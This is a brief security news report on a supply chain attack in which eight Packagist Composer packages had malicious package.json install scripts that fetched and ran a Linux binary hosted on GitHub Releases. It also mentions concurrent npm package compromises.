Packagist Supply Chain Attack Infects Eight Composer Packages

Unidentified threat actors targeted the Packagist repository this month, infecting eight Composer packages with malicious scripts ^[1].

This attack demonstrates a sophisticated method of bypassing standard PHP security checks by targeting JavaScript configuration files within PHP ecosystems. By exploiting the intersection of different package managers, attackers can execute unauthorized code on developer machines and within automated CI/CD pipelines.

The attackers inserted malicious scripts into the `package.json` files of the compromised packages ^[1]. These scripts were designed to download and execute a Linux binary hosted on a GitHub Releases URL ^[1]. This allowed the threat actors to run arbitrary code on victim machines during the installation process.

"Although the affected packages were all Composer packages, the malicious code was not added to composer.json," Socket said. "Instead, it was inserted into package.json, targeting projects that ship JavaScript."

This incident occurs amid a broader surge of supply-chain compromises across various registries. Separate attacks this month included the compromise of 42 npm packages in a TanStack attack ^[2] and over 320 npm packages hit by a Mini Shai-Hulud attack ^[3]. Furthermore, a related breach reportedly impacted 3,800 internal GitHub repositories ^[4].

Security researchers noted that the use of GitHub Releases to host the binary helped the malware evade some detection systems by leveraging a trusted domain. The attack specifically targeted the build and deployment phase of software development—the point where dependencies are resolved and installed.